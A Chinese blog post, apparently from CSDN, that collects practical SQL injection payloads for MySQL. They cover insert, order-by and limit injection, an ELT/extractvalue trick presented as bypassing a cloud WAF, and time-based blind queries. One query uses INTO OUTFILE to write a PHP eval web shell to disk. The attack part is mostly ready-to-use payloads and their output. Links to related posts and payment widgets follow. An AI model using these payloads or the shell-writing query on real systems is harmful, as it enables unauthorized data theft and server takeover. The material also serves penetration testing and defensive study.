SQL注入实战总结

已于 2022-10-15 15:16:48 修改
阅读量1.3k 收藏 4
点赞数
分类专栏: # 漏洞总结 文章标签: sql 数据库
于 2021-06-16 10:59:02 首次发布
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/117950584
版权

文章目录

0x01 insert注入

insert into tablename(col1,col2,col3) values(v1,v2,v3)

拼接即可,判断哪个不报错,并且观察回显位

1')--+
1','2')--+
1','2','3')--+

如果没有回显只是报错

' or updatexml(1,concat('~',(select database()),'~'),1)  or '

0x02 ELT注入

该思路来自一位朋友分享,绕过了云waf

elt 函数可以代替ifcase when
extractvalue() 可以来代替updatexml 函数

elt()

elt(n,str1,str2,str3);
该函数的作用是,返回参数中的第n个字符串,参数可以是字符串常量或者列名。

比如:
select elt(2'888','666');
其返回的结果是666。

如果第一个参数是0,则返回NULL。并且如果第一个参数是0,后面无论是什么,都不会考虑了,如果是函数,则不会运行了。

payload:

# 正确报错
select extractvalue(1,ELT(substring(current_user,1,1)="r","~",1));	
ERROR 1105 (HY000): XPATH syntax error: '~'

# 错误回显
select extractvalue(1,ELT(substring(current_user,1,1)="q","~",1));
+------------------------------------------------------------+
| extractvalue(1,ELT(substring(current_user,1,1)="q","~",1)) |
+------------------------------------------------------------+
| NULL                                                       |
+------------------------------------------------------------+
1 row in set (0.000 sec)

extra'ctvalue(1,EL'T(1=1,"~",1))
extra'ctvalue(1,EL'T(substring(current_user,1,1)="s","~",1))

0x03 limit注入

Mysql下Limit注入方法 | 离别歌 (leavesongs.com)
此方法适用于MySQL 5.x中,在 limit语句后面的注入

PROCEDURE

报错注入

后面加单引号直接报错了

 SELECT * FROM `demo03`.`dso_news` WHERE status=99 AND catid IN (147,152,240,153,193,194,195,196,154,242,243,244,245,246,155,272,277,278,279,280,283,285,148,159,290,291,292,293,294,298,289,295,296,299,149,164,150,168,308,151,172,284) ORDER BY listorder ASC,id DESC LIMIT 30\'

可以看到注入位置是在limit后面,并且还将单引号转义了,本地测试limit注入如下

procedure analyse(1,extractvalue(rand(),concat(0x3a,version())))

在这里插入图片描述
时间盲注

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select 
extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

INTO

(INTO 关键字在有写权限可以用来写文件)

尝试利用 into outfile 写shell 虽然dumpfile也可以写文件但是因为 dumpfile 后面没有附加参数(export_options) 这点是 into outfile 利用的关键

SELECT * FROM `user` WHERE `id` = 1 LIMIT 1 into outfile "C:/Users/administrator/Desktop/a.php" lines terminated by "<?php eval($_POST[1]);?>";

在这里插入图片描述

0x04 html网页注入

有的时候会遇到这种注入,加载网页后面,感觉很奇葩,记录一下payload
在这里插入图片描述直接在网页后面加单引号就报错了
在这里插入图片描述最后payload如下,类似于'||'a'<'b

/cn'+AND+updatexml(0,concat(0x7e,(select+version()),0x7e),0)+AND+'000TqP0'='000TqP0/

在这里插入图片描述

0x05 order by注入

更多参考:sql注入之order by注入 

# 报错注入
select *from cy order by id and(updatexml(1,concat(0x7e,(select user())),0));

# 盲注
select *from cy order by id,(select 1 from (select sleep(1))a);

# union$query  = "select * from test order by user_id $evil;";没有使用括号包裹的时候,是无法直接使用union查询的。
当 $query  = "(select * from test order by user_id $evil);";使用括号进行包裹的时候,此时是可以进行union查询的。
payload:
(select *from cy order by id)union(select 1,version(),3);

在这里插入图片描述

# if
select *from cy order by if(1=,id,name);
select *from cy order by if(1=2,id,name);

0x06 实战payload

if(now()=sysdate(),sleep(6),0)

在这里插入图片描述

天问_Herbert555
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql手工注入实战
mulincong的博客
05-30 2207
sql手工注入封神台靶场
SQL注入实战经验总结
03-17
怎么找注入点,注入思路总结,注入完整过程细节
入门级SQL注入实战-sqli_labs
2302_76378481的博客
06-15 706
ascii表的s值对应的是115,如果我们猜测到115的时候,and后面的值为真,前面的值也为真,就会出现 1 and 1的情况, 页面就会有提示信息。确定数据库的表是3列了,接下来使用union联合查询,查询当前数据库名,查询时讲前面的查询语句设为空,所以输入没有的值,111 union select 1,database(),3,后面代码逻辑第一行不显示,所以在第二个字段查询。大家好,这篇文章写的是一些入门级简单的sql注入,可以简单看一下,写了集中注入的手法,联合注入、报错注入、布尔盲注、延时盲注。
【burpsuite安全练兵场-服务端1】SQL注入-17个实验(全)
热门推荐
12-27 1万+
【BP靶场-服务端-SQL注入】16个实验-万文详细步骤
一篇文章教你玩转,入门级 SQL 注入实战
最新发布
2301_79535618的博客
05-17 564
得到users表的所有字段。uname=a&passwd=a’union select database(),2 # &submit=Submit查询到当前的数据库为security,或者使用:uname=a’ union select database(),2 # & passwd=a&submit=Submit均可查询到当前数据库,当然也可以查询其它信息。直接在username中填写admin’or 1=1#,password随便写,此时登录成功,Username存在SQL注入漏洞。
网络渗透测试实验3:SQL注入(DVWA+SQLmap+Mysql注入实战
zzzfff__的博客
11-21 1691
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
浅谈Sql注入总结笔记整理(超详细)
ytdd66的博客
05-06 62
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息,在实战和测试中,难免会遇见到一些sql注入,下面,我将总结一些常用sql注入中的不同姿势。
sql注入教程.sql注入实战
11-09
sql注入详细教程 寻找存在sql注入的网址 探测过滤 tamper 得到shell
SQL注入实战
11-20
安全大神冰河亲自制作SQL注入入门级案例,非常适合初学者研究实践SQL注入,更好的提升自身对SQL 漏洞的注入能力和对数据库安全的认识。
sql注入实战
06-08
本文档描述了sql注入实战技巧。所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令...
SQL注入绕过实战案例
08-31
SQL sqli-labs-master 靶场搭建
SQL注入非常详细总结
dreamthe的博客
05-25 1万+
个人觉得还是很详细,对你一定帮助。也是我自己花了不少时间总结的。
SQL注入实验
2301_76346422的博客
04-17 1133
所谓sql注入,就是通过把sql命令插入到web表单提交或输出域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的sql命令,从而进一步得到相应的数据信息通过构造一条精巧的雨具,来查询到想要得到的信息。
SQL 注入 DVWA 实验
m0_63645854的博客
04-10 2004
SQL注入与自动注入
漏洞篇(SQL注入一)
m0_58001548的博客
03-26 1150
此时我们输入的第一个单引号将 username 的单引号闭合,相当于输入了一个空用户,or 表示左右两边只要有一边条件判断成立则该语句返回结果为真,其中 1=1 永远为真,所以当前 SQL 语句无论怎么执行结果永远为真,--空格表示注释,注释后面所有代码不再执行。我们可以看到上面我们闭合的方法是没有输入用户名的,所以并不能成功登陆。
SQL盲注
火柴人的博客
03-17 1293
0x00盲注的一般模式 1.and 0 mysql> select * from bsqli where id = 1 and 1(payload结果) and sleep(1); Empty set (1.00 sec) mysql> select * from bsqli where id = 1 and 0(payload结果) and sleep(1); Empty set ...
网络安全——SQL注入实验
网络工程
12-12 2313
1、掌握SQL注入的原理。2、通过开源网站渗透平台DVWA实战,掌握常见的SQL注入方法。3、具体内容:1)学习配置开源网站渗透平台DVWA(Damn Vulnerable Web Application)。2)学习常见的SQL语句:create、select、drop、union等。3)学习相关SQL注入方法并在实验平台验证。
SQL注入类型
yggcwhat
12-13 2435
SQL注入类型详解 SQL 注入是指web应用程序对用户输入数据控制不严格,导致用户输入数据被拼接到SQL语句中被数据库执行导致的安全问题,按照注入方式可以分为联合注入、布尔盲注、时间盲注、堆叠注入以及报错注入等五种注入方式。在sql注入时影响返回单行的不仅仅是sql 语句的问题,有时是代码层面的问题。 判断注入是否存在 and 1=1,and 1=2 返回页面数据不同 ?id=3-1,返回数据内容不同 添加’、""以及其他特殊符号报错 … 联合注入 前提要求:数据会进行回显,页面有显位符,在一个在一个网
sql 注入实战
终日而思不如须臾所学。
11-30 1905
直接开整 // 后端接口 // get my all todos router.post("/api/todo/list", (req, res) => { let { _openid = 'kong', } = { ...req.body } console.log(_openid) const sql = ` select * from todo_today where _openid = '${_openid}' ` sqlQuery(sql,
sql注入实战项目操作过程
10-21
SQL注入实战项目操作过程一般包括以下步骤: 1. 确定目标网站并进行信息收集,包括网站结构、数据库类型、网站漏洞等。 2. 使用工具或手动方式进行漏洞扫描,寻找可利用的SQL注入漏洞。 3. 利用找到的漏洞进行注入攻击,获取目标网站的敏感信息或者控制目标网站。 4. 对注入点进行深入挖掘,尝试获取更多的敏感信息或者提升攻击权限。 5. 在攻击结束后,清理痕迹并修复漏洞,以免被其他攻击者利用。 需要注意的是,进行SQL注入攻击是非常危险的行为,必须遵守法律法规和道德规范,不得进行未经授权的攻击行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值